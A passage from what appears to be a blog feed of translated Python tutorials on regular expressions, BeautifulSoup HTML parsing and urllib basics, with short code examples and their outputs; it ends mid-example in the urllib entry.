# result: [(&#39;333&#39;, &#39;bbb&#39;, &#39;444&#39;, &#39;bbb&#39;, &#39;333&#39;)]
re.findall(r&#39;(\d+)([a-z]+)(\d+)(\1)(\2)&#39;, &#39;333bbb444bbb333&#39;)
# result: []</code></pre>
<h2 id="非捕获组"><a href="#非捕获组" class="headerlink" title="Non-capturing groups"></a>Non-capturing groups</h2>
<p>Enclose all the alternatives in parentheses and separate adjacent alternatives with |. Parentheses have a side effect, though: the matched text is captured (cached). Putting ?: before the first alternative removes this side effect.</p>
<p>?: is one of the non-capturing constructs. The other two are ?= and ?!, which carry extra meaning. The former is a positive lookahead: it matches at any position where the pattern inside the parentheses matches what follows. The latter is a negative lookahead: it matches at any position where that pattern does not match what follows.</p>
<pre><code>import re
# (?:pattern) differs from (pattern) only in that it does not capture:
# the group takes part in matching, but its text is not saved and it gets no group number
s = &#39;industry is industries lala industyyy industiii&#39;
re.findall(r&#39;industr(?:y|ies)&#39;, s)
# result: [&#39;industry&#39;, &#39;industries&#39;]
s = &#39;Windows2000 Windows3.1&#39;
re.findall(r&#39;Windows(?=95|98|NT|2000)&#39;, s)
# result: [&#39;Windows&#39;]
# Matches the &quot;Windows&quot; in &quot;Windows2000&quot;, not the one in &quot;Windows3.1&quot;.
s = &#39;Windows2000 Windows3.1&#39;
re.findall(r&#39;Windows(?!95|98|NT|2000)&#39;, s)
# result: [&#39;Windows&#39;]
# Matches the &quot;Windows&quot; in &quot;Windows3.1&quot;, not the one in &quot;Windows2000&quot;.
s = &#39;aaa111aaa,bbb222,333ccc,444ddd444,555eee666,fff777ggg&#39;
re.findall(r&#39;([a-z]+)\d+([a-z]+)&#39;, s)
# result: [(&#39;aaa&#39;, &#39;aaa&#39;), (&#39;fff&#39;, &#39;ggg&#39;)]
re.findall(r&#39;(?P&lt;g1&gt;[a-z]+)\d+(?P=g1)&#39;, s)
# result: [&#39;aaa&#39;]
re.findall(r&#39;(?P&lt;g1&gt;[a-z]+)\d+(?P=g1)&#39;, &#39;aaa111aaa,bbb222,333ccc,444ddd444,555eee666,fff777fff&#39;)
# result: [&#39;aaa&#39;, &#39;fff&#39;]
re.findall(r&#39;[a-z]+(\d+)([a-z]+)&#39;, s)
# result: [(&#39;111&#39;, &#39;aaa&#39;), (&#39;777&#39;, &#39;ggg&#39;)]
re.findall(r&#39;([a-z]+)\d+&#39;, s)
# result: [&#39;aaa&#39;, &#39;bbb&#39;, &#39;ddd&#39;, &#39;eee&#39;, &#39;fff&#39;]
re.findall(r&#39;([a-z]+)\d+\1&#39;, s)
# result: [&#39;aaa&#39;]
s = &#39;I have a dog , I have a cat&#39;
re.findall(r&#39;I have a (?:dog|cat)&#39;, s)
# result: [&#39;I have a dog&#39;, &#39;I have a cat&#39;]
re.findall(r&#39;I have a dog|cat&#39;, s)
# result: [&#39;I have a dog&#39;, &#39;cat&#39;]
s = &#39;ababab abbabb aabaab abbbbbab&#39;
re.findall(r&#39;\b(?:ab)+\b&#39;, s)
# result: [&#39;ababab&#39;]
re.findall(r&#39;\b(ab)+\b&#39;, s)
# result: [&#39;ab&#39;]</code></pre>
<h2 id="反向引用"><a href="#反向引用" class="headerlink" title="Backreferences"></a>Backreferences</h2>
<p>When a capturing group (Expression) matches, the text matched by its subexpression is stored in a numbered group in memory. You can think of this as assigning to a local variable, whose value can then be read back through a backreference. Before the group has matched, its content is undetermined; once it has matched, its content is fixed, and so is whatever the backreference refers to.</p>
<p>A backreference must always be used together with a capturing group. If backreference syntax is used without a capturing group, languages behave differently: some raise an exception, others treat it as an ordinary escape.</p>
<pre><code>import re
s = &#39;Is is the cost of of gasoline going up up ?&#39;
re.findall(r&#39;\b([a-z]+) \1\b&#39;, s, re.I)  # case-insensitive
# result: [&#39;Is&#39;, &#39;of&#39;, &#39;up&#39;]
re.findall(r&#39;\b([a-z]+) \1\b&#39;, s)
# result: [&#39;of&#39;, &#39;up&#39;]
s = &#39;http://www.w3cschool.cc:80/html/html-tutorial.html&#39;
re.findall(r&#39;(\w+):\/\/([^/:]+)(:\d*)?([^# ]*)&#39;, s)
# result: [(&#39;http&#39;, &#39;www.w3cschool.cc&#39;, &#39;:80&#39;, &#39;/html/html-tutorial.html&#39;)]</code></pre>
<h2 id="注意区别：pattern-、pattern-、-pattern-、-pattern"><a href="#注意区别：pattern-、pattern-、-pattern-、-pattern" class="headerlink" title="Telling apart pattern+?, pattern*?, (?!pattern) and (?:pattern)"></a>Telling apart pattern+?, pattern*?, (?!pattern) and (?:pattern)</h2>
<h4 id="pattern-、pattern"><a href="#pattern-、pattern" class="headerlink" title="pattern+?、pattern*?"></a>pattern+?、pattern*?</h4>
<p>These two are common and denote lazy matching, that is, matching the shortest string that satisfies the pattern. By default + and * are greedy and match the longest possible string; appending ? to them requests lazy matching.</p>
<h4 id="pattern"><a href="#pattern" class="headerlink" title="(?!pattern)"></a>(?!pattern)</h4>
<p>This acts as a filter: a string that matches pattern is rejected. It is handy for log analysis. For example, to drop log lines that contain the marker info, write ^(?!.*info).*$.</p>
<h4 id="pattern-1"><a href="#pattern-1" class="headerlink" title="(?:pattern)"></a>(?:pattern)</h4>
<p>This construct is mainly a performance optimization and does not change what matches. It means that the text matched by the parenthesized subexpression is not returned and cannot be referenced by backreferences such as \1 or \2.</p>
<h2 id="模式匹配"><a href="#模式匹配" class="headerlink" title="Pattern matching"></a>Pattern matching</h2>
<ol><li>import re imports the regular expression module. All of Python&#39;s regex functions live in the re module, so import it first;</li><li>call re.compile() to create a Regex (pattern) object; its argument is the regular expression to match;</li><li>call the pattern object&#39;s search() method on a string; it returns a match object (called num here) that describes the match, or None if nothing matched;</li><li>call the match object&#39;s group() method to get the text that was actually matched.</li></ol>
<pre><code>import re
s1 = &quot;once upon a time&quot;
s2 = &quot;There once was a man from NewYork&quot;
print(re.findall(r&#39;^once&#39;, s1))
# result: [&#39;once&#39;]
print(re.findall(r&#39;^once&#39;, s2))
# result: []
print(re.findall(r&#39;time$&#39;, s1))
# result: [&#39;time&#39;]
print(re.findall(r&#39;times$&#39;, s1))
# result: []
print(re.findall(r&#39;^time$&#39;, s1))
# result: []
print(re.findall(r&#39;^time$&#39;, &#39;time&#39;))
# result: [&#39;time&#39;]

## compile
s = &#39;111,222,aaa,bbb,ccc333,444ddd&#39;
rule = r&#39;\b\d+\b&#39;
compiled_rule = re.compile(rule)
print(compiled_rule.findall(s))
# result: [&#39;111&#39;, &#39;222&#39;]

## match
print(re.match(&#39;www&#39;, &#39;www.runoob.com&#39;).span())  # pattern is at the start
# result: (0, 3)
print(re.match(&#39;com&#39;, &#39;www.runoob.com&#39;))  # pattern is not at the start
# result: None
line = &quot;Cats are smarter than dogs&quot;
matchObj = re.match(r&#39;(.*) are (.*?) .*&#39;, line, re.M | re.I)
if matchObj:
    print(&quot;matchObj.group() : &quot;, matchObj.group())
    # result: matchObj.group() :  Cats are smarter than dogs
    print(&quot;matchObj.group(1) : &quot;, matchObj.group(1))
    # result: matchObj.group(1) :  Cats
    print(&quot;matchObj.group(2) : &quot;, matchObj.group(2))
    # result: matchObj.group(2) :  smarter
else:
    print(&quot;No match!!&quot;)

## search
print(re.search(&#39;www&#39;, &#39;www.runoob.com&#39;).span())  # pattern is at the start
# result: (0, 3)
print(re.search(&#39;com&#39;, &#39;www.runoob.com&#39;).span())  # pattern is not at the start
# result: (11, 14)
line = &quot;Cats are smarter than dogs&quot;
searchObj = re.search(r&#39;(.*) are (.*?) .*&#39;, line, re.M | re.I)
if searchObj:
    print(&quot;searchObj.group() : &quot;, searchObj.group())
    # result: searchObj.group() :  Cats are smarter than dogs
    print(&quot;searchObj.group(1) : &quot;, searchObj.group(1))
    # result: searchObj.group(1) :  Cats
    print(&quot;searchObj.group(2) : &quot;, searchObj.group(2))
    # result: searchObj.group(2) :  smarter
else:
    print(&quot;Nothing found!!&quot;)

## match versus search
line = &quot;Cats are smarter than dogs&quot;
matchObj = re.match(r&#39;dogs&#39;, line, re.M | re.I)
if matchObj:
    print(&quot;match --&gt; matchObj.group() : &quot;, matchObj.group())
else:
    print(&quot;No match!!&quot;)
    # result: No match!!
matchObj = re.search(r&#39;dogs&#39;, line, re.M | re.I)
if matchObj:
    print(&quot;search --&gt; matchObj.group() : &quot;, matchObj.group())
    # result: search --&gt; matchObj.group() :  dogs
else:
    print(&quot;No match!!&quot;)

## sub
phone = &quot;2004-959-559 # This is Phone Number&quot;
num = re.sub(r&#39;#.*$&#39;, &quot;&quot;, phone)
print(&quot;Phone Num : &quot;, num)
# result: Phone Num :  2004-959-559
num = re.sub(r&#39;\D&#39;, &quot;&quot;, phone)
print(&quot;Phone Num : &quot;, num)
# result: Phone Num :  2004959559</code></pre>
<h2 id="正则表达式与BeautifulSoup"><a href="#正则表达式与BeautifulSoup" class="headerlink" title="Regular expressions with BeautifulSoup"></a>Regular expressions with BeautifulSoup</h2>
<pre><code>from urllib.request import urlopen
from bs4 import BeautifulSoup
import re

html = urlopen(&quot;http://www.pythonscraping.com/pages/page3.html&quot;)
bsObj = BeautifulSoup(html, &#39;lxml&#39;)
# print(bsObj.prettify())
# A raw string keeps the backslashes in the pattern from being read as string escapes
images = bsObj.find_all(&quot;img&quot;, {&quot;src&quot;: re.compile(r&quot;\.\.\/img\/gifts/img.*\.jpg&quot;)})
for image in images:
    print(image[&quot;src&quot;])
# result:
# ../img/gifts/img1.jpg
# ../img/gifts/img2.jpg
# ../img/gifts/img3.jpg
# ../img/gifts/img4.jpg
# ../img/gifts/img6.jpg</code></pre>]]></content>
      
      
      <categories>
          
          <category> Python </category>
          
      </categories>
      
      
        <tags>
            
            <tag> Python </tag>
            
            <tag> regex </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Python Web Crawler in Practice, Part 4: BeautifulSoup</title>
      <link href="/Coderzgh.github.io/2019/05/14/python-crawler-beautifulsoup-4/"/>
      <url>/Coderzgh.github.io/2019/05/14/python-crawler-beautifulsoup-4/</url>
      
        <content type="html"><![CDATA[<h2 id="正文："><a href="#正文：" class="headerlink" title="Main text"></a>Main text</h2>
<p>Beautiful Soup is a Python library for pulling data out of HTML and XML files. It works with your favorite parser to provide idiomatic ways of navigating, searching, and modifying the document. It can save you hours or even days of work.</p>
<p>Install: pip install beautifulsoup4</p>
<blockquote><p>The package named beautifulsoup is the Beautiful Soup 3 release. Many projects still use BS3, so the beautifulsoup package remains available. For a new project, however, you should install beautifulsoup4, which is compatible with both Python 2 and Python 3.</p></blockquote>
<h2 id="BeautifulSoup的基础使用"><a href="#BeautifulSoup的基础使用" class="headerlink" title="Basic usage of BeautifulSoup"></a>Basic usage of BeautifulSoup</h2>
<p>The HTML below is used as the example throughout. It is a passage from Alice in Wonderland (referred to below as the document).</p>
<pre><code>html_doc = &quot;&quot;&quot;
&lt;html&gt;&lt;head&gt;&lt;title&gt;The Dormouse&#39;s story&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;p class=&quot;title&quot;&gt;&lt;b&gt;The Dormouse&#39;s story&lt;/b&gt;&lt;/p&gt;

&lt;p class=&quot;story&quot;&gt;Once upon a time there were three little sisters; and their names were
&lt;a href=&quot;http://example.com/elsie&quot; class=&quot;sister&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;,
&lt;a href=&quot;http://example.com/lacie&quot; class=&quot;sister&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt; and
&lt;a href=&quot;http://example.com/tillie&quot; class=&quot;sister&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;;
and they lived at the bottom of a well.&lt;/p&gt;

&lt;p class=&quot;story&quot;&gt;...&lt;/p&gt;
&quot;&quot;&quot;</code></pre>
<p>Parsing this markup with BeautifulSoup yields a BeautifulSoup object, which can be printed with standard nested indentation.</p>
<pre><code>from bs4 import BeautifulSoup
soup = BeautifulSoup(html_doc, &quot;lxml&quot;)
print(soup.prettify())
# result:
# &lt;html&gt;
#  &lt;head&gt;
#   &lt;title&gt;
#    The Dormouse&#39;s story
#   &lt;/title&gt;
#  &lt;/head&gt;
#  &lt;body&gt;
#   &lt;p class=&quot;title&quot;&gt;
#    &lt;b&gt;
#     The Dormouse&#39;s story
#    &lt;/b&gt;
#   &lt;/p&gt;
#   &lt;p class=&quot;story&quot;&gt;
#    Once upon a time there were three little sisters; and their names were
#    &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;
#     Elsie
#    &lt;/a&gt;
#    ,
#    &lt;a class=&quot;sister&quot; href=&quot;http://example.com/lacie&quot; id=&quot;link2&quot;&gt;
#     Lacie
#    &lt;/a&gt;
#    and
#    &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;
#     Tillie
#    &lt;/a&gt;
#    ;
# and they lived at the bottom of a well.
#   &lt;/p&gt;
#   &lt;p class=&quot;story&quot;&gt;
#    ...
#   &lt;/p&gt;
#  &lt;/body&gt;
# &lt;/html&gt;</code></pre>
<p>A few simple ways to navigate the structured data:</p>
<pre><code>soup.title
# result: &lt;title&gt;The Dormouse&#39;s story&lt;/title&gt;
soup.title.name
# result: &#39;title&#39;
soup.title.string
# result: &#39;The Dormouse&#39;s story&#39;
soup.title.text
# result: &#39;The Dormouse&#39;s story&#39;
soup.title.parent.name
# result: &#39;head&#39;
soup.p
# result: &lt;p class=&quot;title&quot;&gt;&lt;b&gt;The Dormouse&#39;s story&lt;/b&gt;&lt;/p&gt;
soup.p[&#39;class&#39;]
# result: [&#39;title&#39;]  (class is a multi-valued attribute, so a list is returned)
soup.a
# result: &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;
soup.find_all(&#39;a&#39;)
# result:
# [&lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;,
#  &lt;a class=&quot;sister&quot; href=&quot;http://example.com/lacie&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt;,
#  &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;]
soup.find(id=&quot;link3&quot;)
# result: &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;</code></pre>
<p>Find the links of all &lt;a&gt; tags in the document:</p>
<pre><code>for link in soup.find_all(&#39;a&#39;):
    print(link.get(&#39;href&#39;))
# result:
# http://example.com/elsie
# http://example.com/lacie
# http://example.com/tillie</code></pre>
<p>Extract all of the text from the document:</p>
<pre><code>print(soup.get_text())
# result:
# The Dormouse&#39;s story
#
# The Dormouse&#39;s story
#
# Once upon a time there were three little sisters; and their names were
# Elsie,
# Lacie and
# Tillie;
# and they lived at the bottom of a well.
#
# ...</code></pre>
<p>Navigate the parse tree:</p>
<pre><code># direct children
print(soup.body.contents)
for child in soup.body.children:
    print(child)
# all descendants
for child in soup.descendants:
    print(child)
# node text, variant 1: whitespace-only strings such as newlines are included
for string in soup.strings:
    print(repr(string))
# node text, variant 2: whitespace is stripped and empty strings are skipped
for string in soup.stripped_strings:
    print(repr(string))
# siblings (None is returned when there is no sibling)
print(soup.p.next_sibling)
print(soup.p.previous_sibling)
for sibling in soup.a.next_siblings:
    print(repr(sibling))
# next and previous elements
print(soup.head.next_element)
print(soup.head.previous_element)
# parent
from urllib.request import urlopen
html = urlopen(&quot;http://www.pythonscraping.com/pages/page3.html&quot;)
bsObj = BeautifulSoup(html, &quot;lxml&quot;)
print(bsObj.find(&quot;img&quot;, {&quot;src&quot;: &quot;../img/gifts/img1.jpg&quot;}).parent.previous_sibling.get_text())</code></pre>
<p>Query the document with CSS selectors:</p>
<pre><code>print(soup.select(&#39;title&#39;))
print(soup.select(&#39;a&#39;))
print(soup.select(&#39;b&#39;))
print(soup.select(&#39;.sister&#39;))
print(soup.select(&#39;#link1&#39;))
print(soup.select(&#39;p #link1&#39;))
print(soup.select(&#39;head &gt; title&#39;))
print(soup.select(&#39;a[class=&quot;sister&quot;]&#39;))
print(soup.select(&#39;a[href=&quot;http://example.com/elsie&quot;]&#39;))
print(soup.select(&#39;p a[href=&quot;http://example.com/elsie&quot;]&#39;))</code></pre>
<p>Combine with regular expressions or other filters:</p>
<pre><code>import re
for tag in soup.find_all(href=re.compile(&quot;elsie&quot;)):
    print(tag)
# result: &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;

for tag in soup.find_all(&quot;a&quot;, class_=&quot;sister&quot;):
    print(tag)
# result:
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/lacie&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt;
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;

for tag in soup.find_all([&quot;a&quot;, &quot;b&quot;]):
    print(tag)
# result:
# &lt;b&gt;The Dormouse&#39;s story&lt;/b&gt;
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/lacie&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt;
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;

for tag in soup.find_all(True):
    print(tag)
# result:
# &lt;html&gt;&lt;head&gt;&lt;title&gt;The Dormouse&#39;s story&lt;/title&gt;&lt;/head&gt;
# &lt;body&gt;
# &lt;p class=&quot;title&quot;&gt;&lt;b&gt;The Dormouse&#39;s story&lt;/b&gt;&lt;/p&gt;
# &lt;p class=&quot;story&quot;&gt;Once upon a time there were three little sisters; and their names were
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;,
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/lacie&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt; and
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;;
# and they lived at the bottom of a well.&lt;/p&gt;
# &lt;p class=&quot;story&quot;&gt;...&lt;/p&gt;
# &lt;/body&gt;&lt;/html&gt;
# &lt;head&gt;&lt;title&gt;The Dormouse&#39;s story&lt;/title&gt;&lt;/head&gt;
# &lt;title&gt;The Dormouse&#39;s story&lt;/title&gt;
# &lt;body&gt;
# &lt;p class=&quot;title&quot;&gt;&lt;b&gt;The Dormouse&#39;s story&lt;/b&gt;&lt;/p&gt;
# &lt;p class=&quot;story&quot;&gt;Once upon a time there were three little sisters; and their names were
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;,
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/lacie&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt; and
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;;
# and they lived at the bottom of a well.&lt;/p&gt;
# &lt;p class=&quot;story&quot;&gt;...&lt;/p&gt;
# &lt;/body&gt;
# &lt;p class=&quot;title&quot;&gt;&lt;b&gt;The Dormouse&#39;s story&lt;/b&gt;&lt;/p&gt;
# &lt;b&gt;The Dormouse&#39;s story&lt;/b&gt;
# &lt;p class=&quot;story&quot;&gt;Once upon a time there were three little sisters; and their names were
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;,
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/lacie&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt; and
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;;
# and they lived at the bottom of a well.&lt;/p&gt;
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/lacie&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt;
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;
# &lt;p class=&quot;story&quot;&gt;...&lt;/p&gt;

def has_class_but_no_id(tag):
    return tag.has_attr(&#39;class&#39;) and not tag.has_attr(&#39;id&#39;)

for tag in soup.find_all(has_class_but_no_id):
    print(tag)
# result:
# &lt;p class=&quot;title&quot;&gt;&lt;b&gt;The Dormouse&#39;s story&lt;/b&gt;&lt;/p&gt;
# &lt;p class=&quot;story&quot;&gt;Once upon a time there were three little sisters; and their names were
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;,
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/lacie&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt; and
# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;;
# and they lived at the bottom of a well.&lt;/p&gt;
# &lt;p class=&quot;story&quot;&gt;...&lt;/p&gt;</code></pre>
<h2 id="BeautifulSoup的主要参数的使用"><a href="#BeautifulSoup的主要参数的使用" class="headerlink" title="Using BeautifulSoup's main parameters"></a>Using BeautifulSoup's main parameters</h2>
<pre><code>html_doc = &quot;&quot;&quot;
&lt;html&gt;&lt;head&gt;&lt;title&gt;The Dormouse&#39;s story&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;p class=&quot;title&quot;&gt;&lt;b&gt;The Dormouse&#39;s story&lt;/b&gt;&lt;/p&gt;

&lt;p class=&quot;story&quot;&gt;Once upon a time there were three little sisters; and their names were
&lt;a href=&quot;http://example.com/elsie&quot; class=&quot;sister&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;,
&lt;a href=&quot;http://example.com/lacie&quot; class=&quot;sister&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt; and
&lt;a href=&quot;http://example.com/tillie&quot; class=&quot;sister&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;;
and they lived at the bottom of a well.&lt;/p&gt;

&lt;p class=&quot;story&quot;&gt;...&lt;/p&gt;
&quot;&quot;&quot;
import re
import bs4
from bs4 import BeautifulSoup
soup = BeautifulSoup(html_doc, &quot;lxml&quot;)

# the text parameter
soup.find_all(text=&quot;Elsie&quot;)
soup.find_all(text=[&quot;Elsie&quot;, &quot;Lacie&quot;, &quot;Tillie&quot;])
soup.find_all(text=re.compile(&quot;Dormouse&quot;))

# the limit parameter
soup.find_all(&quot;a&quot;, limit=2)

# the recursive parameter
soup.html.find_all(&quot;title&quot;)
soup.html.find_all(&quot;title&quot;, recursive=False)

# Tag objects
print(soup.title)
print(soup.head)
print(soup.a)
print(soup.p)
print(type(soup.a))
print(soup.name)
print(soup.head.name)
print(soup.p.attrs)
print(soup.p[&#39;class&#39;])
print(soup.p.get(&#39;class&#39;))
soup.p[&#39;class&#39;] = &quot;newclass&quot;
print(soup.p)
del soup.p[&#39;class&#39;]
print(soup.p)

# NavigableString objects
print(soup.p.string)
print(type(soup.p.string))

# the BeautifulSoup object
print(type(soup.name))
print(soup.name)
print(soup.attrs)

# Comment objects
print(soup.a)
print(soup.a.string)
print(type(soup.a.string))
if type(soup.a.string) == bs4.element.Comment:
    print(soup.a.string)</code></pre>
<h2 id="BeautifulSoup解析在线网页实例"><a href="#BeautifulSoup解析在线网页实例" class="headerlink" title="Examples: parsing live web pages with BeautifulSoup"></a>Examples: parsing live web pages with BeautifulSoup</h2>
<pre><code>from urllib.request import urlopen
from bs4 import BeautifulSoup
html = urlopen(&#39;http://www.pythonscraping.com/exercises/exercise1.html&#39;)
bsObj = BeautifulSoup(html.read(), &#39;lxml&#39;)
print(bsObj.h1)

# filtering by CSS class
from urllib.request import urlopen
from bs4 import BeautifulSoup
html = urlopen(&#39;http://www.pythonscraping.com/pages/warandpeace.html&#39;)
bsObj = BeautifulSoup(html, &#39;lxml&#39;)
nameList = bsObj.find_all(&#39;span&#39;, {&#39;class&#39;: &#39;green&#39;})
for name in nameList:
    print(name.get_text())

# find() and find_all()
from urllib.request import urlopen
from bs4 import BeautifulSoup
html = urlopen(&#39;http://www.pythonscraping.com/pages/warandpeace.html&#39;)
bsObj = BeautifulSoup(html, &#39;lxml&#39;)
allText = bsObj.find_all(id=&#39;text&#39;)
print(allText[0].get_text())</code></pre>
<p>For more usage, see the <a href="https://www.crummy.com/software/BeautifulSoup/bs4/doc.zh/" target="_blank" rel="noopener">BeautifulSoup documentation (Chinese)</a>.</p>]]></content>
      
      
      <categories>
          
          <category> Python </category>
          
      </categories>
      
      
        <tags>
            
            <tag> Python </tag>
            
            <tag> BeautifulSoup </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Python Web Crawler in Practice, Part 3: The Basic Libraries urllib and requests</title>
      <link href="/Coderzgh.github.io/2019/05/13/python-crawler-urllib-requests-3/"/>
      <url>/Coderzgh.github.io/2019/05/13/python-crawler-urllib-requests-3/</url>
      
        <content type="html"><![CDATA[<h1 id="Python网络爬虫实战之三：基本工具库urllib和requests"><a href="#Python网络爬虫实战之三：基本工具库urllib和requests" class="headerlink" title="Python网络爬虫实战之三：基本工具库urllib和requests"></a>Python Web Crawler in Practice, Part 3: The Basic Libraries urllib and requests</h1>
<h1 id="一、urllib"><a href="#一、urllib" class="headerlink" title="一、urllib"></a>1. urllib</h1>
<h3 id="urllib简介"><a href="#urllib简介" class="headerlink" title="urllib简介"></a>Introduction to urllib</h3>
<p>urllib is Python's standard package for working with URLs and one of the basic libraries used when writing crawlers. It ships with Python, so nothing extra needs to be installed.</p>
<h3 id="urllib在python2-x与python3-x中的区别"><a href="#urllib在python2-x与python3-x中的区别" class="headerlink" title="urllib在python2.x与python3.x中的区别"></a>Differences between urllib in Python 2.x and Python 3.x</h3>
<p>Python 2.x splits the functionality between urllib and urllib2; Python 3.x merges them into a single urllib package. The two are used somewhat differently, so take care when porting code.</p>
<table><thead><tr><th>Python 2.x</th><th>Python 3.x</th></tr></thead><tbody><tr><td>import urllib2</td><td>import urllib.request, urllib.error</td></tr><tr><td>import urllib</td><td>import urllib.request, urllib.error, urllib.parse</td></tr><tr><td>import urlparse</td><td>import urllib.parse</td></tr><tr><td>urllib2.urlopen</td><td>urllib.request.urlopen</td></tr><tr><td>urllib.urlencode</td><td>urllib.parse.urlencode</td></tr><tr><td>urllib.quote</td><td>urllib.parse.quote</td></tr><tr><td>cookielib.CookieJar</td><td>http.cookiejar.CookieJar</td></tr><tr><td>urllib2.Request</td><td>urllib.request.Request</td></tr></tbody></table>
<h3 id="urllib的四个子模块"><a href="#urllib的四个子模块" class="headerlink" title="urllib的四个子模块"></a>The four submodules of urllib</h3>
<p>In Python 3.6, urllib contains the following four submodules. In the words of the official documentation, "urllib is a package that collects several modules for working with URLs".</p>
<ul><li>urllib.request opens and reads URLs ("urllib.request for opening and reading URLs"). It works like typing an address into a browser and pressing Enter: pass the URL and any other parameters to its functions and the request is simulated for you.</li><li>urllib.error contains the exceptions raised by urllib.request ("urllib.error containing the exceptions raised by urllib.request"). Catching them lets you retry or take other action so the program does not terminate unexpectedly.</li><li>urllib.parse parses URLs ("urllib.parse for parsing URLs") and provides many URL-handling functions such as splitting, parsing, joining, and encoding.</li><li>urllib.robotparser parses robots.txt files ("urllib.robotparser for parsing robots.txt files") so you can tell which pages of a site may be crawled and which may not.</li></ul>
<h3 id="使用urllib打开网页"><a href="#使用urllib打开网页" class="headerlink" title="使用urllib打开网页"></a>Opening web pages with urllib</h3>
<p>The most basic way to open a web page</p>
<pre><code># The most basic way to open a web page
from urllib.request import urlopen

response = urlopen(&quot;http://www.baidu.com&quot;)
print(type(response))
print(response.status)
print(response.getheaders())
print(response.getheader(&#39;Server&#39;))
html = response.read()
print(html)</code></pre>
<p>Opening a page with the data parameter</p>
<pre><code># Open a page with the data parameter (sent as a POST body)
from urllib.parse import urlencode
from urllib.request import urlopen

data = bytes(urlencode({&#39;word&#39;: &#39;hello&#39;}), encoding=&#39;utf8&#39;)
response = urlopen(&#39;http://httpbin.org/post&#39;, data=data)
print(response.read().decode(&#39;utf-8&#39;))</code></pre>
<p>Opening a page with the timeout parameter (1)</p>
<pre><code># Open a page with the timeout parameter (1)
from urllib.request import urlopen

# response = urlopen(&#39;http://httpbin.org/get&#39;, timeout=0.1)
response = urlopen(&#39;http://httpbin.org/get&#39;, timeout=1)
print(response.read())</code></pre>
<p>Opening a page with the timeout parameter (2)</p>
<pre><code># Open a page with the timeout parameter (2): catch the timeout
from urllib.request import urlopen

try:
    response = urlopen(&#39;http://httpbin.org/get&#39;, timeout=0.1)
    print(response.read())
except Exception as e:
    print(e)</code></pre>
<p>Opening a page by building a Request (1)</p>
<pre><code># Open a page by building a Request (1)
from urllib.request import Request
from urllib.request import urlopen

request = Request(&#39;https://python.org&#39;)
response = urlopen(request)
print(response.read().decode(&#39;utf-8&#39;))</code></pre>
<p>Opening a page by building a Request (2)</p>
<pre><code># Open a page by building a Request (2): custom headers and POST data
from urllib.request import Request
from urllib.request import urlopen
from urllib.parse import urlencode

url = &#39;http://httpbin.org/post&#39;
headers = {
